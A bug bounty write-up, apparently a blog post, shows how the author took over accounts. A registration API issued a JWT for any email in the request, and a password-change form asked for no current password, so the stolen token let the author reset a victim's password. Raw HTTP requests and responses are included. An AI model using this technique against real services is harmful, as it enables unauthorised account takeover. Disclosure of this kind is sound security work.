A tale of critical account take over

Hello everyone I hope everyone is healthy and safe taking precautions as well

So , I am going to share my latest finding which I have found on private program let’s get started !!

So first thing i do is check login with google and Facebook feature on program and I had this feature in my program

How does that work :

1) click on login with google

2) enter you email id and password

Simple right ?? Wait for twist

we all know vulnerability like changing email with other user email that will logged into their account but not the case this time

As , my program was using jwt authentication it will generate jwt for given email after successfully login attempt

basically while logged in with google I intercepted all request one by one

and surprisingly in my burp history I found an api endpoint that that generates jwt token of user via taking email id as parameter see below

POST /register?src=aweb HTTP/1.1

Host: userapi.target.com

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: https://www.target.com

cp-origin: 11

Content-Type: application/json

X-Auth-Token: xxxxx

X-JWT-Token:

Origin: https://www.target.com

Content-Length: 1354

Connection: close

{“name”:”Shivam Pandey”,”email”:”shivam@gmail.com”,”providerUserId”:”103151677586368643333",”providerToken”:” eyFuZGV5IiwibG9jYWxlIjoiZW4tR0IiLCJpYXQiOjE1OTQyMjE3NzQsImV4cCI6MTU5NDIyNTM3NCwianRpIjoiODI4MWQwMWNhMTI0NTBkODA0YWQ4YzdkYWEzYTQ5MWI1MTA4M2JlMSJmHBAN06Wv1CspbxbXxxvlCieGHjlXrF5S8TbQvLTwIHKwdlbXhbuYydHpTubRQojAc_ZcHdHlMgumx6XJLvUk10dHkN_V1eQ”,”providerName”:”g”}

In above request “provider token” will generate jwt token for given email . so here I changed email with my test account that is testhunter@gmail.com and got his jwt token see response

HTTP/1.1 200

Content-Type: application/json;charset=UTF-8

Content-Length: 476

Connection: close

Date: Wed, 08 Jul 2020 15:42:16 GMT

Server: nginx/1.16.1

X-Content-Type-Options: nosniff

X-XSS-Protection: 1; mode=block

Cache-Control: no-cache, no-store, max-age=0, must-revalidate

Pragma: no-cache

Expires: 0

Strict-Transport-Security: max-age=31536000 ; includeSubDomains

X-Frame-Options: DENY

Access-Control-Allow-Origin: https://www.target.com

Vary: Origin

Access-Control-Allow-Credentials: true

X-Application-Context: application:prod

X-Cache: Miss from cloudfront

{“userInfo”:{“id”:8023402,”name”:”Test account Reddy”,”email”:”testhunter@gmail.com”,”status”:2,”phone”:”xxxxxxxxxx",”phoneVerified”:true,”socialUserId”:”8023402",”wasUserExists”: :true,”coins”:1209.00},”jwtToken”:”eyJhbGciOiJIUzUxMiJ9.MjM0MDIiLCJpYXQiOjE1OTQyMjI5MzYsImlzcyI6ImFkZGEyNDcuY29tIiwibmFtZSI6IlNyaWthbnRoIFJlZGR5In0.CNjPEj182YvEsdqMOYE_MauFnkl”}

Hey I have changed jwt token for security purpose

After seeing this I was like :

So I already have jwt token what I can do ?? I know I can perform email change request but my target doesn’t not allow it 😒

So saw there is small low hanging fruit on account setting page wanna see

No current passowrd required for change passowrd

So I quickly made intercept request for new password see below

So in email param I changed it with my test account email it gave me 401

So I just changed jwt token which I steal previously with changing email param and successfully changed victim password

For confirmation got this on victim window

I was like yes eureka !!!

Takeaway:

1)Always mess with api endpoint

2) check burp history for juicy endpoints

3) test login with google and Facebook feature

Timeline : reported

Got duplicate but still learned a lot

Got question or suggestions ?? Find me on twitter